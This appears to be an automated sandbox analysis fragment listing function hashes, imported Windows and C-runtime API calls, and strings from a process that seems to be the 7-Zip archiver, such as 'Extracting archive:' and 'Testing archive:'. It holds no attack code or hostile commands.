                                                                                                                                                                                                        • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                        • Instruction ID: a487bc2c7b1094883adf160b4f7f1d866d18420894e8d14a94d4033d8c8e6d94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6331CE623569C081CE30EB25E8803AEB3E1F792790F4545A2CA9E57768DF78C885CB81
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B56464: FreeLibrary.KERNELBASE(?,?,?,00B564E7), ref: 00B56475
                                                                                                                                                                                                          • Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
                                                                                                                                                                                                          • Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00B7A8CA
                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00B7A8E8
                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00B7A908
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7A985
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7A996
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                                                                                        • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                                                                                        • API String ID: 852969883-606380122
                                                                                                                                                                                                        • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                        • Instruction ID: 7e09a5f68b871edd0aaabd27123abe5218dd946858f97820f9032dec2db22bd5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6341A226301B4086DB61DF25E89076E73A0FB85B94F48C5A09FAE47765EF38D946C701
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • strcmp.MSVCRT ref: 00B9B723
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9B743
                                                                                                                                                                                                          • Part of subcall function 00B538C8: memmove.MSVCRT(00B5A0E5), ref: 00B53907
                                                                                                                                                                                                          • Part of subcall function 00B53A64: memmove.MSVCRT ref: 00B53AAA
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00B9B49E
                                                                                                                                                                                                          • Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
                                                                                                                                                                                                          • Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C
                                                                                                                                                                                                        • strcmp.MSVCRT ref: 00B9B4E3
                                                                                                                                                                                                        • wcscmp.MSVCRT ref: 00B9B502
                                                                                                                                                                                                        • strcmp.MSVCRT ref: 00B9B568
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                        • API String ID: 591578422-4150638102
                                                                                                                                                                                                        • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                        • Instruction ID: 0190136d57e3ee6f80f821adbd71ea9ae65f1d8dbdf8292174020ff0ec596aad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BA15A77700684E7CB19DF2AE69065D73A1F395B80F8081A6DB5A47B11DF38E8BAC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79C11
                                                                                                                                                                                                          • Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79C19
                                                                                                                                                                                                          • Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79C3B
                                                                                                                                                                                                          • Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79D2A
                                                                                                                                                                                                        • wcscmp.MSVCRT ref: 00B79E66
                                                                                                                                                                                                        • free.MSVCRT ref: 00B79ECA
                                                                                                                                                                                                        • free.MSVCRT ref: 00B79ED4
                                                                                                                                                                                                        • free.MSVCRT ref: 00B79F13
                                                                                                                                                                                                        • free.MSVCRT ref: 00B79F1B
                                                                                                                                                                                                        • free.MSVCRT ref: 00B79F28
                                                                                                                                                                                                        • free.MSVCRT ref: 00B79F49
                                                                                                                                                                                                        • free.MSVCRT ref: 00B79F51
                                                                                                                                                                                                          • Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
                                                                                                                                                                                                          • Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmovewcscmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3584677832-0
                                                                                                                                                                                                        • Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                        • Instruction ID: 34f53c2445bf127a1eaa4cbfc7f1958dc509be46d14affc930aa8fea8cb29c13
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C941E623306A4091CA10EF16E88026FA7E1F786BE9F4452A1EF6D5B764DF38C95EC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92F7E
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92F9D
                                                                                                                                                                                                        • free.MSVCRT ref: 00B92FB6
                                                                                                                                                                                                        • free.MSVCRT ref: 00B92FC1
                                                                                                                                                                                                          • Part of subcall function 00B52C78: free.MSVCRT ref: 00B52CAE
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
                                                                                                                                                                                                          • Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4
                                                                                                                                                                                                        • free.MSVCRT ref: 00B92FCC
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$fputs
                                                                                                                                                                                                        • String ID: =
                                                                                                                                                                                                        • API String ID: 2444650769-2525689732
                                                                                                                                                                                                        • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                        • Instruction ID: 13fc48593121f31f0fb56f105ad3f451ae4d906eb67ea5a12432489335b0d27b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18215E2371994091CE20EB15E49136EA7B0E7D6BE1F4452B2FF5E43B69DF28C949CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 352749199-0
                                                                                                                                                                                                        • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                        • Instruction ID: aa64820219b7fd8d420ce0f35f0f1f3e1e70d744b2b6a6478bac6fa93339d625
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F31FA71218B46DBEB40DF65E89036A7BA1F784B64F504235E76A837A4DF7CC849CB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 352749199-0
                                                                                                                                                                                                        • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                        • Instruction ID: 1be9c4c3821ee94135277cd03da61307b86320fed779c7e051f58d5a49e17200
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59210C71218B42D7EB00DF28E89036A7BA1F784774F505225E66A837B4DF7CC849CB44
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 352749199-0
                                                                                                                                                                                                        • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                        • Instruction ID: 1be9c4c3821ee94135277cd03da61307b86320fed779c7e051f58d5a49e17200
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59210C71218B42D7EB00DF28E89036A7BA1F784774F505225E66A837B4DF7CC849CB44
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 352749199-0
                                                                                                                                                                                                        • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                        • Instruction ID: 1be9c4c3821ee94135277cd03da61307b86320fed779c7e051f58d5a49e17200
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59210C71218B42D7EB00DF28E89036A7BA1F784774F505225E66A837B4DF7CC849CB44
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                        • Instruction ID: 67fd58869e2bbf4b33d8e871c9847eef281abd371b384df5b7ee124fee59021b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5115423742E4496CA24BF72D95122A73A0EB53BB271882F1DF3D27795DF64D8668700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                        • Instruction ID: 3cc4be2a592a7393eb647b4679555d63e53061a63b31feea26aa979971732cb3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC11A522312A4085CF14EF75C8A122D73A0FB82F9AB1446A1AF7E5B765CF24C85A8744
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                        • Instruction ID: 9d5bcac550bb3208cf690d917cd1a6dcf4f8123043cbe24b6612a3dc218c8ed1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A514C63201A4491CB10EF35D49079E77A1F785FC4F9080A2EE4E97729DF78CA8ACB41
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B915D5
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$memset
                                                                                                                                                                                                        • String ID: Extracting archive: $Open$Testing archive:
                                                                                                                                                                                                        • API String ID: 3543874852-295398807
                                                                                                                                                                                                        • Opcode ID: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
                                                                                                                                                                                                        • Instruction ID: 86f6dadff8f7b75fd4866f634ca55f48def43fd3fc3ee3d11c26e4c81608ceb6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A311912274268384DF55DB29D9443EC33A0E756B98F5D84B69E0D4A365EF78C48AD310
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92E47
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92E57
                                                                                                                                                                                                        • free.MSVCRT ref: 00B92EA4
                                                                                                                                                                                                          • Part of subcall function 00B92CFC: fputs.MSVCRT ref: 00B92D41
                                                                                                                                                                                                          • Part of subcall function 00B92CFC: fputs.MSVCRT ref: 00B92DCF
                                                                                                                                                                                                          • Part of subcall function 00B92CFC: free.MSVCRT ref: 00B92DFF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free
                                                                                                                                                                                                        • String ID: =
                                                                                                                                                                                                        • API String ID: 3873070119-2525689732
                                                                                                                                                                                                        • Opcode ID: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
                                                                                                                                                                                                        • Instruction ID: 77296061615d56c71f242f4bcfb5147c48f9089917a417d527478e129408bd0f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CF0AE5270590091DD20E726E99137E6361E7C6FF5F0493A1AE6E477E8DF2CC549C701
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B84A5C
                                                                                                                                                                                                        • free.MSVCRT ref: 00B84A67
                                                                                                                                                                                                        • free.MSVCRT ref: 00B84AE4
                                                                                                                                                                                                          • Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339
                                                                                                                                                                                                        • free.MSVCRT ref: 00B84B0F
                                                                                                                                                                                                        • free.MSVCRT ref: 00B84B1A
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3352498445-0
                                                                                                                                                                                                        • Opcode ID: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                        • Instruction ID: fadc569ffc074e8c7b1d1fb9e607b64f4b361d0a2079b39083b4b6ffa8289664
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F418B23205B8591CB24EF25D4903AE67E1FB86B85F4810B2EF8E4B728DF38C599C314
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
